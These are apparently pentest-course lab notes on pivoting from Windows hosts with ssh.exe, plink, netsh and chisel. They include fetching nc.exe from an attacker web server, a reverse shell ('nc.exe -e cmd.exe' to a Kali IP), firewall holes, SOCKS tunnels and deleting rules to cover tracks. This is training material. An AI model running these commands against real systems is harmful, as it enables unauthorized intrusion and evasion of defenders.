x

Port Forwarding with Windows Tools

19.3.1 - ssh.exe

Start by making sure the ssh server is running on the Kali machine 

sudo systemctl start ssh

We can check for ssh.exe on Windows machines, then run it if it is present 

where ssh

ssh.exe -V

We can now create a remote dynamic port forward to our Kali machine 

ssh -N -R 9998 kali@192.168.118.4

Check the SOCKS proxy port is open on Kali 

ss -ntplu

Update proxychains4 to use this socket (socks5 127.0.0.1 9998) 

tail /etc/proxychains4.conf

Before OpenSSH was so readily available on Windows, most network administrators' tools of choice were PuTTY and its command-line-only counterpart, Plink.

We can use apache2 to download nc.exe 

sudo systemctl start apache2

Then copy nc exe over to the apache directory 

find / -name nc.exe 2>/dev/null

sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/

We can then grab the file through PowerShell 

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

We can then connect back to our Kali 

C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446

Now we can download plink on Kali 

find / -name plink.exe 2>/dev/null

Then copy it over to apache to retrieve it on the target 

sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/

powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

Pass the username (I) and the password (-pw) through the command line directly 

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

We can confirm the port has opened on the kali machine 

ss -ntplu

We should now be able to connect through localhost 

xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

19.3.3 - netsh

There is a native way to create a port forward on Windows we should explore: the built-in firewall configuration tool Netsh (also known as Network Shell). Using Netsh, we can set up a port forward with the portproxy subcontext within the interface context. Note this example is in context to a machine we're trying to reach behind a LAN but cannot, so we need to create a port forward on the WAN accessible machine that will listen on the WAN interface and forward packets to the SSH port on the LAN accessible machine.

We'll instruct netsh interface to add a portproxy rule from an IPv4 listener that is forwarded to an IPv4 port (v4tov4). 

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=172.16.93.202 connectport=8080 connectaddress=172.16.93.202

We can conform port 2222 is listening through netstat on the target 

netstat -anp TCP | find "2222"

We can also confirm that the port forward is stored by issuing the show all command in the netsh interface portproxy subcontext. 

netsh interface portproxy show all

If a port is filtered, the firewall is likely not blocking connections through 2222. We can use the netsh advfirewall subcontext to create a hole and name the rule something descriptive like port_forward_ssh_2222. 

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

We can verify the filtered and, after running the command, open status of 2222 with nmap via Kali 

sudo nmap -sS 192.168.50.64 -Pn -n -p2222

We should now be able to connect. 

ssh database_admin@192.168.50.64 -p2222

We can delete the rule when we're done with the connection and are covering our tracks 

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

We can also delete the port forward we created 

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

19.3.4 - Chisel.exe

chisel client 172.168.16.93:8000 R:socks 

.\chisel.exe server -p 8000 --socks5

.\chisel.exe client 192.168.45.171:8000 1080:socks 

chisel server -p 8000 --socks5
Left-click: follow link, Right-click: select node, Scroll: zoom
x